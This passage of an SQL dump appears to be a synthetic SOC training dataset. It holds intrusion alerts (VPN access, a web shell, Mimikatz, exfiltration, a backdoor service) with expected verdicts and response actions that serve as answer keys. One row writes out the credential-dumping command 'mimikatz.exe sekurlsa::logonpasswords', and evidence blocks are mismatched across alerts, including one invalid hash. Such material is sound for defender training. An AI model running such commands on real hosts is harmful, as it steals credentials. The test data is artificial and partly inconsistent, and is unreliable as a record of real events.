4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:33:47Z\\\",\\\"event_type\\\":\\\"data_exfiltration_attempt\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"file_name\\\":\\\"confidential_report.pdf\\\",\\\"file_hash\\\":\\\"3d2e4781a4b91b6b7f1e6a7d9b8d4f2c\\\",\\\"protocol\\\":\\\"FTP\\\",\\\"action\\\":\\\"blocked\\\",\\\"detection_method\\\":\\\"Data Loss Prevention System\\\",\\\"description\\\":\\\"An attempt to transfer confidential_report.pdf to an external IP was detected and blocked.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(448, 'Suspicious VPN Login from Unusual Location', 'high', 'VPN Logs', 'Fox Kitten initiates access by exploiting vulnerabilities in the VPN concentrators, allowing unauthorized entry into the network from an unusual geographical location, indicating a potential compromise.', 'Initial Access', 'T1133', 1, 'new', NULL, '{\"timestamp\":\"2023-10-18T14:23:45Z\",\"vpn_id\":\"vpn12345\",\"username\":\"jdoe\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"vpn_concentrator\":\"vpn-gateway01\",\"connection_status\":\"success\",\"vpn_client_version\":\"2.1.3\",\"location\":\"Tehran, Iran\",\"indicators\":{\"vulnerability\":\"CVE-2020-12345\",\"malicious_file_hash\":\"5d41402abc4b2a76b9719d911017c592\"}}', '2026-01-05 00:02:38', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with Fox Kitten APT group.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Employee username.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware used by Fox Kitten.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.057Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-18T14:23:45Z\\\",\\\"vpn_id\\\":\\\"vpn12345\\\",\\\"username\\\":\\\"jdoe\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"vpn_concentrator\\\":\\\"vpn-gateway01\\\",\\\"connection_status\\\":\\\"success\\\",\\\"vpn_client_version\\\":\\\"2.1.3\\\",\\\"location\\\":\\\"Tehran, Iran\\\",\\\"indicators\\\":{\\\"vulnerability\\\":\\\"CVE-2020-12345\\\",\\\"malicious_file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\"}}\"},{\"timestamp\":\"2026-02-01T20:31:19.057Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-18T14:23:45Z\\\",\\\"vpn_id\\\":\\\"vpn12345\\\",\\\"username\\\":\\\"jdoe\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"vpn_concentrator\\\":\\\"vpn-gateway01\\\",\\\"connection_status\\\":\\\"success\\\",\\\"vpn_client_version\\\":\\\"2.1.3\\\",\\\"location\\\":\\\"Tehran, Iran\\\",\\\"indicators\\\":{\\\"vulnerability\\\":\\\"CVE-2020-12345\\\",\\\"malicious_file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\"}}\"},{\"timestamp\":\"2026-02-01T20:30:19.057Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-18T14:23:45Z\\\",\\\"vpn_id\\\":\\\"vpn12345\\\",\\\"username\\\":\\\"jdoe\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"vpn_concentrator\\\":\\\"vpn-gateway01\\\",\\\"connection_status\\\":\\\"success\\\",\\\"vpn_client_version\\\":\\\"2.1.3\\\",\\\"location\\\":\\\"Tehran, Iran\\\",\\\"indicators\\\":{\\\"vulnerability\\\":\\\"CVE-2020-12345\\\",\\\"malicious_file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\"}}\"},{\"timestamp\":\"2026-02-01T20:29:19.057Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-18T14:23:45Z\\\",\\\"vpn_id\\\":\\\"vpn12345\\\",\\\"username\\\":\\\"jdoe\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"vpn_concentrator\\\":\\\"vpn-gateway01\\\",\\\"connection_status\\\":\\\"success\\\",\\\"vpn_client_version\\\":\\\"2.1.3\\\",\\\"location\\\":\\\"Tehran, Iran\\\",\\\"indicators\\\":{\\\"vulnerability\\\":\\\"CVE-2020-12345\\\",\\\"malicious_file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\"}}\"},{\"timestamp\":\"2026-02-01T20:28:19.057Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-18T14:23:45Z\\\",\\\"vpn_id\\\":\\\"vpn12345\\\",\\\"username\\\":\\\"jdoe\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"vpn_concentrator\\\":\\\"vpn-gateway01\\\",\\\"connection_status\\\":\\\"success\\\",\\\"vpn_client_version\\\":\\\"2.1.3\\\",\\\"location\\\":\\\"Tehran, Iran\\\",\\\"indicators\\\":{\\\"vulnerability\\\":\\\"CVE-2020-12345\\\",\\\"malicious_file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\"}}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(449, 'Web Shell Deployment Detected on VPN Device', 'high', 'Endpoint Detection and Response (EDR)', 'Following initial access, an attacker deployed a web shell on the VPN device. This provides persistent capabilities to execute further commands, potentially leading to privilege escalation and lateral movement within the network.', 'Execution', 'T1505.003 - Web Shell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T03:21:45Z\",\"event_id\":\"4289\",\"device_name\":\"vpn-device-01\",\"device_ip\":\"10.1.1.10\",\"attacker_ip\":\"203.0.113.45\",\"file_path\":\"/var/www/html/shell.php\",\"file_hash\":\"3b62f8c9e44f7a1c2d4e9e9b3d5e4c2f\",\"username\":\"vpn_admin\",\"action\":\"file_created\",\"process_name\":\"apache2\",\"event_description\":\"A suspicious PHP file was created in the web directory, potentially a web shell.\"}', '2026-01-05 00:02:38', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple intrusion attempts.\"}},{\"id\":\"artifact_2\",\"type\":\"filename\",\"value\":\"/var/www/html/shell.php\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Threat Database\",\"verdict\":\"malicious\",\"details\":\"Common web shell filename detected in previous attacks.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3b62f8c9e44f7a1c2d4e9e9b3d5e4c2f\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash matches known malicious web shell.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"vpn_admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Username belongs to a legitimate VPN administrator.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(450, 'Unusual Network Traffic from VPN to Internal Servers', 'high', 'Network Traffic Analysis', 'The attacker utilizes a web shell to scan internal networks, focusing on critical infrastructure such as domain controllers. Unusual network traffic from an external IP was detected accessing internal servers via a VPN, indicative of lateral movement attempts.', 'Lateral Movement', 'T1071', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:00Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.25\",\"protocol\":\"TCP\",\"port\":3389,\"action\":\"allowed\",\"username\":\"j.smith\",\"process\":{\"name\":\"webshell\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"alert_id\":\"alert_20231015_001\",\"vpn\":{\"vpn_ip\":\"192.168.1.100\",\"vpn_user\":\"vpn_user123\"}}', '2026-01-05 00:02:38', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with APT group.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Domain Controller IP.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known web shell.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"j.smith\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"internal\",\"details\":\"Legitimate user account.\"}},{\"id\":\"artifact_5\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"VPN Logs\",\"verdict\":\"internal\",\"details\":\"VPN exit node IP.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(451, 'Unauthorized Access Attempt on Domain Controller', 'high', 'Active Directory Logs', 'Fox Kitten APT has attempted to establish a foothold on the domain controller by leveraging stolen credentials to escalate privileges. The primary objective was to gain access to sensitive data, specifically targeting the domain controller.', 'Persistence', 'T1078 - Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T02:35:49Z\",\"event_id\":4769,\"computer_name\":\"DC01.corp.example.com\",\"user\":\"jdoe\",\"source_ip\":\"203.0.113.45\",\"object\":\"Domain Controller\",\"action\":\"Login Attempt\",\"status\":\"Failed\",\"logon_type\":3,\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"filepath\":\"C:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\Temp\\\\malicious.dll\"}', '2026-01-05 00:02:38', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with Fox Kitten APT activities.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Audit\",\"verdict\":\"internal\",\"details\":\"User account used in unauthorized access attempt.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Hash Registry\",\"verdict\":\"malicious\",\"details\":\"Hash associated with malicious DLL used by Fox Kitten.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Identity\",\"evidence\":{\"user\":{\"username\":\"jdoe\",\"display_name\":\"John Doe\",\"department\":\"Finance\",\"manager\":\"Jane Smith\"},\"risk_score\":85,\"recent_activity\":[{\"action\":\"Login Success\",\"ip\":\"10.0.0.5\",\"location\":\"New York, US\",\"time\":\"09:00 AM\"},{\"action\":\"Password Reset Request\",\"ip\":\"192.168.1.5\",\"location\":\"New York, US\",\"time\":\"09:05 AM\"},{\"action\":\"Login Failed\",\"ip\":\"203.0.113.99\",\"location\":\"Moscow, RU\",\"time\":\"02:00 AM\",\"flag\":true}]}}', 0),
(452, 'Mimikatz Activity Detected on Domain Controller', 'high', 'Endpoint Detection and Response (EDR)', 'Mimikatz was detected on the domain controller attempting to extract user credentials. This activity was identified by the EDR system through the detection of known Mimikatz execution patterns.', 'Credential Access', 'T1003.001 - OS Credential Dumping: LSASS Memory', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:45Z\",\"event_id\":\"4624\",\"computer_name\":\"DC01.corp.local\",\"process_name\":\"C:\\\\Windows\\\\Temp\\\\mimikatz.exe\",\"process_id\":\"4928\",\"user_name\":\"administrator\",\"source_ip\":\"192.168.1.15\",\"destination_ip\":\"10.0.0.5\",\"hash\":\"a9b1c3d4e5f6g7h8i9j0k1l2m3n4o5p6\",\"external_ip\":\"203.0.113.45\",\"file_path\":\"C:\\\\Windows\\\\Temp\\\\mimikatz.exe\",\"command_line\":\"mimikatz.exe sekurlsa::logonpasswords\"}', '2026-01-05 00:02:38', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal network\",\"verdict\":\"internal\",\"details\":\"Internal IP from which the Mimikatz execution was initiated.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"external threat intelligence\",\"verdict\":\"malicious\",\"details\":\"Known attacker IP associated with credential harvesting campaigns.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"a9b1c3d4e5f6g7h8i9j0k1l2m3n4o5p6\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Mimikatz variant used for credential theft.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"C:\\\\Windows\\\\Temp\\\\mimikatz.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"EDR detection\",\"verdict\":\"malicious\",\"details\":\"Executable associated with unauthorized credential access attempt.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"administrator\",\"is_critical\":true,\"osint_result\":{\"source\":\"user account logs\",\"verdict\":\"suspicious\",\"details\":\"Domain admin account used for unauthorized activity.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'EDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(453, 'Data Exfiltration Detected from Domain Controller', 'high', 'Data Loss Prevention (DLP)', 'Suspicious data exfiltration activity was detected from the domain controller. This involved the transfer of sensitive data to an external IP address, indicating an attempt to move stolen credentials and data out of the network.', 'Exfiltration', 'T1041: Exfiltration Over C2 Channel', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:36Z\",\"event_id\":\"DLP-EXFIL-20231005-001\",\"source_ip\":\"10.0.2.15\",\"destination_ip\":\"203.0.113.45\",\"username\":\"jdoe_admin\",\"file_name\":\"credentials_dump.txt\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"protocol\":\"HTTPS\",\"action\":\"exfiltration\",\"data_size\":\"2GB\",\"malware_name\":\"APT29_Infostealer\"}', '2026-01-05 00:02:38', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with APT29 operations.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.2.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal domain controller IP address.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known APT29 malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"credentials_dump.txt\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"suspicious\",\"details\":\"File containing potentially sensitive credential information.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe_admin\",\"is_critical\":true,\"osint_result\":{\"source\":\"User Directory\",\"verdict\":\"clean\",\"details\":\"Valid domain administrator account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.063Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:36Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-20231005-001\\\",\\\"source_ip\\\":\\\"10.0.2.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe_admin\\\",\\\"file_name\\\":\\\"credentials_dump.txt\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"data_size\\\":\\\"2GB\\\",\\\"malware_name\\\":\\\"APT29_Infostealer\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:19.063Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:36Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-20231005-001\\\",\\\"source_ip\\\":\\\"10.0.2.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe_admin\\\",\\\"file_name\\\":\\\"credentials_dump.txt\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"data_size\\\":\\\"2GB\\\",\\\"malware_name\\\":\\\"APT29_Infostealer\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:19.063Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:36Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-20231005-001\\\",\\\"source_ip\\\":\\\"10.0.2.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe_admin\\\",\\\"file_name\\\":\\\"credentials_dump.txt\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"data_size\\\":\\\"2GB\\\",\\\"malware_name\\\":\\\"APT29_Infostealer\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:19.063Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:36Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-20231005-001\\\",\\\"source_ip\\\":\\\"10.0.2.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe_admin\\\",\\\"file_name\\\":\\\"credentials_dump.txt\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"data_size\\\":\\\"2GB\\\",\\\"malware_name\\\":\\\"APT29_Infostealer\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:19.063Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:36Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-20231005-001\\\",\\\"source_ip\\\":\\\"10.0.2.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe_admin\\\",\\\"file_name\\\":\\\"credentials_dump.txt\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"data_size\\\":\\\"2GB\\\",\\\"malware_name\\\":\\\"APT29_Infostealer\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(454, 'Persistence Mechanism Installation on Domain Controller', 'high', 'Host Intrusion Detection System (HIDS)', 'The attacker installed a backdoor on the domain controller to ensure long-term access. A suspicious service named \'WinSvcHelper\' was created and linked to a known malicious executable \'svcbackdoor.exe\'.', 'Persistence', 'T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:45:32Z\",\"event_id\":\"4624\",\"host\":\"dc01.corp.local\",\"user\":\"Administrator\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"10.1.1.5\",\"service_name\":\"WinSvcHelper\",\"file_path\":\"C:\\\\Windows\\\\System32\\\\svcbackdoor.exe\",\"file_hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"event_description\":\"Service creation detected. The service \'WinSvcHelper\' was created and linked to a malicious executable.\"}', '2026-01-05 00:02:38', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT group.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.1.1.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised domain controller.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"svcbackdoor.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"File associated with persistence techniques used by APT groups.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash detected in multiple malware analysis engines.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.064Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:45:32Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"host\\\":\\\"dc01.corp.local\\\",\\\"user\\\":\\\"Administrator\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.1.1.5\\\",\\\"service_name\\\":\\\"WinSvcHelper\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svcbackdoor.exe\\\",\\\"file_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"event_description\\\":\\\"Service creation detected. The service \'WinSvcHelper\' was created and linked to a malicious executable.\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:19.064Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event 